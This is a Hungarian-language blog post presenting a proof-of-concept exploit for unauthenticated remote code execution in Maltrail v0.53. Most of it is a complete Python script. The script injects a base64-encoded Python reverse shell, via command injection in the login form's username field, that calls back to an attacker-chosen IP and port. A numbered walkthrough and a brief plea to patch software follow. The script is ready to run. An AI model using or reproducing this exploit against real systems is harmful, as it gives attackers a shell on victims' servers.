Ebben a blogbejegyzésben a Maltrail v0.53 kizsákmányolásával foglalkozunk, amely lehetővé teszi a nem hitelesített távoli kódvégrehajtást (RCE). Ez a biztonsági rés a CVE-2023–27163 azonosítót kapta.

Áttekintés:

Exploit Title: Maltrail v0.53 – Nem hitelesített távoli kódvégrehajtás (RCE)

Exploit Szerző: Iyaad Luqman K (init_6)

Alkalmazás: Maltrail v0.53

Tesztelve: Ubuntu 22.04

CVE: CVE-2023–27163

Proof of Concept (PoC):

A kizsákmányolás a Maltrail alkalmazás egy sebezhetőségét használja fel tetszőleges kód futtatására a célrendszeren. Az alábbi kód bemutatja az exploit működését:

import sys
import os
import base64

def main():
    listening_IP = None
    listening_PORT = None
    target_URL = None

    if len(sys.argv) != 4:
        print("Error. Needs listening IP, PORT and target URL.")
        return(-1)

    listening_IP = sys.argv[1]
    listening_PORT = sys.argv[2]
    target_URL = sys.argv[3] + "/login"
    print("Running exploit on " + str(target_URL))
    curl_cmd(listening_IP, listening_PORT, target_URL)

def curl_cmd(my_ip, my_port, target_url):
    payload = f'python3 -c \\'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\\''
    encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
    command = f"curl '{target_url}' --data 'username=;`echo+\\"{encoded_payload}\\"+|+base64+-d+|+sh`'"
    os.system(command)

if __name__ == "__main__":
    main()

Hogyan működik az Exploit:

  1. Az exploit parancsfájl három argumentumot igényel: a figyelő IP-t, a figyelő portot és a cél URL-t.
  2. A szkript létrehoz egy hasznos adatot, amely végrehajtásakor fordított shell-kapcsolatot hoz létre vissza a támadó gépéhez.
  3. Ezt a hasznos adatot ezután a Base64 kódolja a tartalmának elhomályosítására.
  4. A curl parancs a hasznos terhet a cél URL-re, különösen a bejelentkezési végpontra küldi.
  5. Sikeres esetben a hasznos terhelés végrehajtásra kerül a célrendszeren, és a támadónak egy shellt biztosít az áldozat gépén.

Diagram:

Ez az exploit kiemeli a szoftverek rendszeres frissítésének és javításának fontosságát. A Maltrail v0.53 egy kritikus biztonsági réssel rendelkezik, amely lehetővé teszi a támadók számára, hogy hitelesítés nélkül tetszőleges kódot hajtsanak végre a célrendszeren. Alapvető fontosságú, hogy tisztában legyünk az ilyen sérülékenységekkel, és megfelelő intézkedéseket tegyünk azok enyhítésére.